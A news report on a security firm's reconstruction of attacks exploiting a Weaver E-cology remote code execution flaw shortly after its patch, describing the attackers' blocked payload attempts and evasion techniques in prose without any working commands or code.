Vega spots Weaver E-cology attacks within days of patch

Vega has identified active exploitation of the Weaver E-cology remote code execution flaw CVE-2026-22679, with activity beginning within five days of the vendor patch.

The finding adds a detailed case study to the vulnerability in Weaver E-cology 10.0, a widely used collaboration and office management platform. The flaw has a CVSS score of 9.8 and allows unauthenticated command execution through an exposed debug endpoint.

Researchers said the vulnerable endpoint passes attacker-controlled parameters to a command execution helper without authentication or input validation. As a result, attackers can run operating system commands through the application's Java virtual machine.

Vega said the earliest evidence it observed predates broader public reporting of attacks in the wild, highlighting how quickly attackers can move from patch analysis to live exploitation.

Its analysis also extends beyond the initial compromise. Using endpoint detection and response telemetry, Vega reconstructed roughly a week of attacker activity on a single host, offering a view of how operators behaved after gaining access.

Attack chain

The sequence began with checks designed to confirm remote code execution. Attackers used ping callbacks tied to Goby attack-surface mapping infrastructure and relied on the application itself to return command output.

They then made repeated attempts to deliver payloads through PowerShell-based downloads, but endpoint defences quarantined each retrieved executable.

The activity then shifted across several techniques. Attackers disguised files as legitimate software, including an executable named to imitate Node Version Manager, and tried to deploy a Windows Installer package called fanwei0324.msi that appeared to reference the target software and attack date.

That installation attempt failed. Vega also found that the operators copied and renamed a legitimate Microsoft-signed PowerShell binary in an apparent effort to evade process-name-based detections.

Further efforts focused on fileless execution. Researchers said the attackers repeatedly tried to pull remote PowerShell scripts into memory using both obfuscated and clear-text commands.

Throughout the intrusion, they executed common reconnaissance commands, including whoami, ipconfig and tasklist, through the same vulnerable endpoint. That approach let them work through discrete HTTP request-response exchanges rather than maintaining a persistent shell or deploying an agent.

No foothold

A notable feature of the case was the absence of a durable post-compromise presence. Vega found no evidence that the attackers successfully established persistence, installed secondary payloads or created follow-on process chains.

Instead, the debug endpoint itself served as the command channel for the full sequence of actions, from validation and discovery to payload delivery attempts. That made the intrusion more iterative than a conventional compromise, in which attackers quickly gain a stable foothold.

Researchers said defensive controls created repeated friction at each stage. Endpoint protections blocked executable downloads, obfuscated scripts and in-memory loaders, preventing the attackers from turning access into a more entrenched position.

Daniel Messing, Cyber Threat Intelligence Lead at Vega, described the case as a clear example of how quickly exploitation can begin after a patch becomes available.

"This activity shows that attackers aren't waiting around. They're exploiting critical flaws within days of a patch being released. In this case, we saw them repeatedly try to get code execution on a target, cycling through payloads, changing techniques, and even attempting to disguise their activity. What makes this particularly notable is that they didn't need a foothold in the traditional sense - the exposed debug endpoint effectively gave them a built-in way to run commands on the system," Messing said.

Infrastructure used

Vega identified several pieces of infrastructure involved in the operation, including servers used to host executables and MSI packages, endpoints used to deliver PowerShell scripts, and callback systems associated with the Goby scanning framework.

Overlap with Goby-linked infrastructure suggests shared tooling or reuse of publicly available resources, but does not support attribution to a specific threat actor.

The case underlines a practical challenge for defenders. Even when a fix exists, the gap between patch release and exploitation may be short, while attackers can keep probing the same target through repeated low-level attempts if an exposed execution path remains available.

In this instance, Vega's reconstruction suggests that repeated command execution through the application was enough to sustain a week-long intrusion attempt, even though every effort to deploy a more permanent payload was blocked.